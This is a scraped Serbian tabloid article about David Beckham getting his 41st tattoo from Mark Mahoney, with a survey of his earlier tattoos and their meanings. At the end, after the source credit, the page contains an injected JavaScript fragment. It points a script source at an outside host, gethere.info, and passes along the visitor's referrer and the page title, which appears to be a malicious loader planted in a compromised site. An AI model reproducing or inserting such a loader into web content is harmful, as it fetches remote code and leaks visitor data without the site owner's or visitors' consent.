ZAVISNIK O IGLI: Dejvid Bekam rekorder po broju tetovaža! (FOTO)

ZAVISNIK O IGLI: Dejvid Bekam rekorder po broju tetovaža! (FOTO)

Foto: Instagram


 

Osim na stomaku i bedrima, bivši engleski fudbaler gotovo da nema više mesta na telu za novu tetovažu.

Dejvid Bekam otišao je pod iglu 41. put, a autor njegovog novog umetničkog dela je holivudski majstor tetovaže Mark Mahoni koji se smatra tvorcem crno-sive tehnike izvedene jednom iglom.

Tatu u realističnom stilu, kojeg je “naslikao” Bekamu naslikao na zglobu leve noge, prikazuje par koji trči ka budućnosti ostavljajući sve materijalno za sobom.

Fotografijom nove tetovaže, za koju je umetnik utrošio punih pet sati, suprug Viktorije Bekam pohvalio se na Instagramu, gde ima čak 21 milion pratilaca, uz rečenicu:

– Ništa ne traje predugo dok razgovaraš sa zanimljivom osobom poput Mahonija – napisao je bivši fudbaler koji ima samo jedan porok – tetovaže.

 

bekam tatu

 

Bekam je prvi tatu uradio 1999. godine kada mu se rodio najstariji sin Bruklin. Iste godine je odao počast i supruzi Viktoriji tetovirajući njeno ime na sanskritu.

Iako su stručnjaci za sanskrit kasnije uočili da je tatu majstor pogrešio, pa je nekadašnjem sportisti na telu napisao “Vihctoria”, ali Bekama to nije obeshrabrilo da poseti salon još 39 puta.

Od 2000. godine, kada je na leđima istetovirao krila anđela čuvara, uglavnom ga fasciniraju religiozni motivi. Na torzu ima lik Isusa kojeg nose tri heruvima, što predstavlja njega i njegova tri sina, zatim lik Isusa s krunom, kao i damu u šumi čije je značenje misterija.

Među Bekamovim tatuima je i anđeo s natpisom “Neka me mrze, samo dok me se boje” što su reči rimskog cara Kaligule. Ima i nekoliko biblijskih citata od kojih je jedan posvetio dedi koji je preminuo 2009.godine.

Ćerki Harper posvetio je natpis “Zgodna dama”, a ima i njeno ime, kao i imena četvoro dece. Venac od ruža obeležava njegovu desetu godišnjicu braka, ima i svoju godinu rođenja – 1975, kao i 1999.godinu kada se oženio Viktorijom, a tetovirao je i lik voljene supruge i to sa fotografije na kojoj je bila stilizovna u glumicu Brižit Bardo.

 

(Jutarnji.hr)s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

loading...

+ Trenutno nema komentara

Dodajte komentar